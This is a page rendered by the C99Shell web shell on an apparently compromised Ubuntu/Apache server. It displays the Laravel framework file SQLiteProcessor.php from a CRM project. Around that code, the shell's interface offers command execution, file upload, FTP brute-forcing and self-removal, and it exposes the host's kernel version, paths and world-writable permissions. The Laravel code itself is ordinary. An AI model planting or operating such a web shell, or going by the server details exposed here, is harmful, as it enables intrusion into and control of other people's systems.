!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/vendor/laravel/framework/src/Illuminate/Database/Query/Processors/   drwxrwxrwx
Free 13.2 GB of 57.97 GB (22.77%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SQLiteProcessor.php (2.9 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Database\Query\Processors;

class 
SQLiteProcessor extends Processor
{
    
/**
     * Process the results of a column listing query.
     *
     * @deprecated Will be removed in a future Laravel version.
     *
     * @param  array  $results
     * @return array
     */
    
public function processColumnListing($results)
    {
        return 
array_map(function ($result) {
            return ((object) 
$result)->name;
        }, 
$results);
    }

    
/**
     * Process the results of a columns query.
     *
     * @param  array  $results
     * @return array
     */
    
public function processColumns($results)
    {
        
$hasPrimaryKey array_sum(array_column($results'primary')) === 1;

        return 
array_map(function ($result) use ($hasPrimaryKey) {
            
$result = (object) $result;

            
$type strtolower($result->type);

            return [
                
'name' => $result->name,
                
'type_name' => strtok($type'(') ?: '',
                
'type' => $type,
                
'collation' => null,
                
'nullable' => (bool) $result->nullable,
                
'default' => $result->default,
                
'auto_increment' => $hasPrimaryKey && $result->primary && $type === 'integer',
                
'comment' => null,
            ];
        }, 
$results);
    }

    
/**
     * Process the results of an indexes query.
     *
     * @param  array  $results
     * @return array
     */
    
public function processIndexes($results)
    {
        
$primaryCount 0;

        
$indexes array_map(function ($result) use (&$primaryCount) {
            
$result = (object) $result;

            if (
$isPrimary = (bool) $result->primary) {
                
$primaryCount += 1;
            }

            return [
                
'name' => strtolower($result->name),
                
'columns' => explode(','$result->columns),
                
'type' => null,
                
'unique' => (bool) $result->unique,
                
'primary' => $isPrimary,
            ];
        }, 
$results);

        if (
$primaryCount 1) {
            
$indexes array_filter($indexes, fn ($index) => $index['name'] !== 'primary');
        }

        return 
$indexes;
    }

    
/**
     * Process the results of a foreign keys query.
     *
     * @param  array  $results
     * @return array
     */
    
public function processForeignKeys($results)
    {
        return 
array_map(function ($result) {
            
$result = (object) $result;

            return [
                
'name' => null,
                
'columns' => explode(','$result->columns),
                
'foreign_schema' => null,
                
'foreign_table' => $result->foreign_table,
                
'foreign_columns' => explode(','$result->foreign_columns),
                
'on_update' => strtolower($result->on_update),
                
'on_delete' => strtolower($result->on_delete),
            ];
        }, 
$results);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0144 ]--